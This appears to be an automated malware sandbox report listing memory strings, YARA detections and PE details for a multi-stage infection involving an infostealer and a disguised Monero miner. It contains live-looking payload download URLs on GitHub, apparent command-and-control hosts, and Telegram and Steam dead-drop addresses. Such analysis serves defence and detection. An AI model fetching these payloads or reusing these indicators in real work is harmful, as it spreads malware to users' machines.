                      Source: 77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745507177.000000000079D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2872982174.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2824507847.00000000007A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/#
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2872982174.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop//
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2824507847.00000000007A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/0
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2775102059.00000000007A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/7
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2824507847.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2849408040.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/C
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2923711164.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2898848742.00000000007A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/G
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2801209203.00000000007A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/K
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2872982174.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/O
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2824507847.00000000007A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/W
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2923711164.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2898848742.00000000007A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/d$
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2824507847.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2801209203.00000000007A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/g
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2824507847.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2801209203.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2775102059.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2849408040.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/rosoft
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2824507847.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2801209203.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2849408040.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/saenh.dll
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2824507847.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2801209203.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2775102059.00000000007A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/u%
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2923711164.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2898848742.00000000007A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/w
                      Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6AD22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                      Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6ACD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                      Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6AD22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                      Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6AD03000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002D.00000003.2733073587.000001EE6AD22000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002D.00000003.2733073587.000001EE6AD48000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002D.00000003.2733073587.000001EE6AD67000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002D.00000003.2733073587.000001EE6AD54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                      Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6AD22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                      Source: 4268204ace.exe, 0000000F.00000002.2729833635.0000000002BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                      Source: powershell.exe, 00000028.00000002.2631755685.00000000051E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: 4268204ace.exe, 0000000F.00000000.2555729362.00000000007D2000.00000002.00000001.01000000.0000000C.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Urijas/moperats/raw/refs/heads/main/biyjdfjadaw.exe
                      Source: 4268204ace.exe, 0000000F.00000000.2555729362.00000000007D2000.00000002.00000001.01000000.0000000C.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002B59000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Urijas/moperats/raw/refs/heads/main/ktyihkdfesf.exe
                      Source: 77594b3442.exe, 00000039.00000002.3103939592.0000000000549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat:443/api
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
                      Source: 77594b3442.exe, 00000031.00000003.3040740995.000000000053B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                      Source: powershell.exe, 00000020.00000002.2598419733.0000000006387000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2642561965.00000000060F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6AD22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                      Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6ACD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                      Source: 4268204ace.exe, 0000000F.00000002.2729833635.0000000002C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                      Source: 4268204ace.exe, 0000000F.00000002.2729833635.0000000002C0C000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Urijas/moperats/refs/heads/main/biyjdfjadaw.exe
                      Source: 4268204ace.exe, 0000000F.00000002.2729833635.0000000002C1E000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Urijas/moperats/refs/heads/main/ktyihkdfesf.exe
                      Source: 4268204ace.exe, 0000000F.00000002.2729833635.0000000002C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.comD
                      Source: 4268204ace.exe, 0000000F.00000002.2742198429.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2742198429.0000000003CBA000.00000004.00000800.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000000.2720818695.0000000000423000.00000008.00000001.01000000.00000013.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000000.2720818695.0000000000423000.00000008.00000001.01000000.00000013.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                      Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D549F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store-im.pXu
                      Source: 77594b3442.exe, 00000031.00000003.2941963499.0000000005301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                      Source: 77594b3442.exe, 00000031.00000003.3014208025.000000000565E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: 77594b3442.exe, 00000031.00000003.3014208025.000000000565E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                      Source: 77594b3442.exe, 00000031.00000003.2968639998.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2942066458.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2970465845.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2941963499.0000000005301000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2968949040.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 513dad5c05.exe, 00000038.00000003.3191808258.0000000005610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                      Source: 77594b3442.exe, 00000031.00000003.2942066458.00000000052D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                      Source: 77594b3442.exe, 00000031.00000003.2968639998.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2942066458.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2970465845.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2941963499.0000000005301000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2968949040.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 513dad5c05.exe, 00000038.00000003.3191808258.0000000005610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                      Source: 77594b3442.exe, 00000031.00000003.2942066458.00000000052D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745507177.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745170967.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745170967.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/0
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745507177.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745170967.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/Iu
                      Source: 4268204ace.exe, 0000000F.00000002.2742198429.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2742198429.0000000003CBA000.00000004.00000800.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745507177.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000000.2720818695.0000000000423000.00000008.00000001.01000000.00000013.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2776399397.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745507177.000000000079D000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2776399397.0000000000779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2776399397.0000000000779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aell
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000000.2720818695.0000000000423000.00000008.00000001.01000000.00000013.sdmpString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745507177.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745170967.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/p
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745170967.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                      Source: 77594b3442.exe, 00000031.00000003.3040740995.000000000053B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                      Source: 77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: 77594b3442.exe, 00000031.00000003.3040740995.000000000053B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                      Source: 77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: 77594b3442.exe, 00000031.00000003.3014208025.000000000565E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                      Source: 77594b3442.exe, 00000031.00000003.3014208025.000000000565E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                      Source: 77594b3442.exe, 00000031.00000003.3014208025.000000000565E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                      Source: 77594b3442.exe, 00000031.00000003.3014208025.000000000565E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: 77594b3442.exe, 00000031.00000003.3014208025.000000000565E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000024.00000002.2597932225.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, explorer.exe, 00000033.00000002.2995871768.00000001402DD000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                      Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000024.00000002.2597932225.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, explorer.exe, 00000033.00000002.2995871768.00000001402DD000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard
                      Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000024.00000002.2597932225.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, explorer.exe, 00000033.00000002.2995871768.00000001402DD000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard%s
                      Source: 9d4ddc637a.exe, 0000003A.00000003.3173171015.0000000001484000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3173955465.0000000001666000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000002.3185990259.0000000001666000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3155290607.00000000008E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

                      System Summary

                      barindex
                      Source: 36.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                      Source: 36.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                      Source: 51.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                      Source: 51.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                      Source: 34.3.Intel_PTT_EK_Recertification.exe.237117f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                      Source: 34.3.Intel_PTT_EK_Recertification.exe.237117f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                      Source: 34.3.Intel_PTT_EK_Recertification.exe.237117f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                      Source: 34.3.Intel_PTT_EK_Recertification.exe.237117f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                      Source: 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                      Source: 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
                      Source: 9d4ddc637a.exe, 0000003A.00000002.3176645675.0000000000EA2000.00000002.00000001.01000000.00000020.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d9d32420-5
                      Source: 9d4ddc637a.exe, 0000003A.00000002.3176645675.0000000000EA2000.00000002.00000001.01000000.00000020.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7e645980-5
                      Source: file.bin.7.drZip Entry: encrypted
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name: .idata
                      Source: skotes.exe.0.drStatic PE information: section name:
                      Source: skotes.exe.0.drStatic PE information: section name: .idata
                      Source: 513dad5c05.exe.5.drStatic PE information: section name:
                      Source: 513dad5c05.exe.5.drStatic PE information: section name: .idata
                      Source: ce29828af5.exe.5.drStatic PE information: section name:
                      Source: ce29828af5.exe.5.drStatic PE information: section name: .idata
                      Source: random[3].exe.5.drStatic PE information: section name:
                      Source: random[3].exe.5.drStatic PE information: section name: .idata
                      Source: random[3].exe.5.drStatic PE information: section name:
                      Source: 964c9facda.exe.5.drStatic PE information: section name:
                      Source: 964c9facda.exe.5.drStatic PE information: section name: .idata
                      Source: 964c9facda.exe.5.drStatic PE information: section name:
                      Source: random[4].exe1.5.drStatic PE information: section name:
                      Source: random[4].exe1.5.drStatic PE information: section name: .idata
                      Source: random[4].exe1.5.drStatic PE information: section name:
                      Source: random[1].exe1.5.drStatic PE information: section name:
                      Source: random[1].exe1.5.drStatic PE information: section name: .idata
                      Source: random[1].exe1.5.drStatic PE information: section name:
                      Source: 9c2981f3e5.exe.5.drStatic PE information: section name:
                      Source: 9c2981f3e5.exe.5.drStatic PE information: section name: .idata
                      Source: 9c2981f3e5.exe.5.drStatic PE information: section name:
                      Source: d7884c562e.exe.5.drStatic PE information: section name:
                      Source: d7884c562e.exe.5.drStatic PE information: section name: .idata
                      Source: d7884c562e.exe.5.drStatic PE information: section name:
                      Source: random[1].exe2.5.drStatic PE information: section name:
                      Source: random[1].exe2.5.drStatic PE information: section name: .idata
                      Source: random[1].exe2.5.drStatic PE information: section name:
                      Source: 0577f55121.exe.5.drStatic PE information: section name:
                      Source: 0577f55121.exe.5.drStatic PE information: section name: .idata
                      Source: 0577f55121.exe.5.drStatic PE information: section name:
                      Source: random[2].exe0.5.drStatic PE information: section name:
                      Source: random[2].exe0.5.drStatic PE information: section name: .idata
                      Source: random[2].exe0.5.drStatic PE information: section name:
                      Source: 77594b3442.exe.5.drStatic PE information: section name:
                      Source: 77594b3442.exe.5.drStatic PE information: section name: .idata
                      Source: 77594b3442.exe.5.drStatic PE information: section name:
                      Source: random[2].exe1.5.drStatic PE information: section name:
                      Source: random[2].exe1.5.drStatic PE information: section name: .idata
                      Source: random[2].exe2.5.drStatic PE information: section name:
                      Source: random[2].exe2.5.drStatic PE information: section name: .idata
                      Source: 7d28d37061cb43098969a37cf25a380a.exe.15.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001D96AC: free,GetFileInformationByHandle,DeviceIoControl,free,free,memmove,free,11_2_001D96AC
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000970490_2_00097049
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000988600_2_00098860
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000978BB0_2_000978BB
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000931A80_2_000931A8
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00054B300_2_00054B30
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00092D100_2_00092D10
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00054DE00_2_00054DE0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00087F360_2_00087F36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0009779B0_2_0009779B
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_007388601_2_00738860
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_007370491_2_00737049
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_007378BB1_2_007378BB
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_007331A81_2_007331A8
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_006F4B301_2_006F4B30
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00732D101_2_00732D10
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_006F4DE01_2_006F4DE0
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00727F361_2_00727F36
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_0073779B1_2_0073779B
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001FF13E11_2_001FF13E
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001F545811_2_001F5458
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001F24C011_2_001F24C0
